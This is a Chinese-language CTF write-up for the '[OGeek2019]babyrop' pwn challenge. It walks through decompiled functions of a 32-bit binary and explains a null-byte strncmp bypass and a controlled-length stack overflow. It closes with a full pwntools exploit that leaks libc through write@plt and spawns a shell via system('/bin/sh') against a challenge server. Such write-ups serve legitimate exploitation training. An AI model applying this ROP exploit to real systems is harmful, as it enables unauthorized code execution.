[OGeek2019]babyrop
checksec 32位程序,其他开了问题不大
main函数
int __cdecl main()
{
int buf; // [esp+4h] [ebp-14h]
char v2; // [esp+Bh] [ebp-Dh]
int fd; // [esp+Ch] [ebp-Ch]
f1();
fd = open("/dev/urandom", 0); #读一个随机数
if ( fd > 0 ) #判断随机数是否大于0
read(fd, &buf, 4u);# 把fd写4个bit到&buf
v2 = f2(buf); # v2 等于f2的返回值
f3(v2);
return 0;
}
f1函数 初始化操作,就是清空缓冲区,没什么好讲的
f2函数
f2的利用点在于read函数会读入0x20个字符串,但是buf只有8大小,但是buf离ebp距离是0x2c,远远达不到覆盖return
addr 的目的,不过f2函数会返回一个值v5给 f3作为参数,strncmp
可以用\x00绕过,在f3中v5的长度只要不等于127就可以完成任意长度的溢出
int __cdecl sub_804871F(int a1)
{
size_t v1; // eax
char s; // [esp+Ch] [ebp-4Ch]
char buf[7]; // [esp+2Ch] [ebp-2Ch]
unsigned __int8 v5; // [esp+33h] [ebp-25h]
ssize_t v6; // [esp+4Ch] [ebp-Ch]
memset(&s, 0, 0x20u);
memset(buf, 0, 0x20u);
sprintf(&s, "%ld", a1); #把a1读给 s
v6 = read(0, buf, 0x20u);# 从终端读取0x20个字符串到buf
buf[v6 - 1] = 0;
v1 = strlen(buf); # buf的长度
if ( strncmp(buf, &s, v1) ) #比较 buf 和 s 比较数是v1也就是buf的长度
exit(0);
write(1, "Correct\n", 8u);
return v5;
}
f3函数
我们可以看到关键的利用点在f3上,f3 的else语句,read读入的是a1的值,a1的值是f2的返回值也就是v5,我们在f2函数中可以通过覆盖来控制v5的值,至此rop链已经构造完成
ssize_t __cdecl sub_80487D0(char a1)
{
ssize_t result; // eax
char buf; // [esp+11h] [ebp-E7h]
if ( a1 == 127 ) #如果a1等于127 就读入0xc8个字符串
result = read(0, &buf, 0xC8u);
else # 如果a1不等于127就读入a1长度的字符串
result = read(0, &buf, a1);
return result;
}
exp
from pwn import *
io = process("./pwn")
io = remote("node4.buuoj.cn",26505)
elf = ELF("./pwn")
libc = ELF("libc-2.23.so")
context(log_level="debug",arch="i386")
write_plt = elf.plt["write"]
read_got = elf.got["read"]
main_func = 0x08048825
payload1 = "\x00" + "\xff"*7
io.sendline(payload1)
io.recvline()
payload2 = flat(["a"*0xE7,"b"*4,write_plt,main_func,1,read_got,0x8])
io.sendline(payload2)
read_addr = u32(io.recv(4))
print read_addr
libcbase = read_addr - libc.symbols["read"]
#print libcbase
system_addr = libcbase + libc.symbols["system"]
binsh = libcbase + next(libc.search("/bin/sh"))
print binsh
payload3 = flat(["a"*0xe7,"b"*4,system_addr,0,binsh])
io.sendline(payload1)
io.recvline()
io.sendline(payload3)
io.interactive()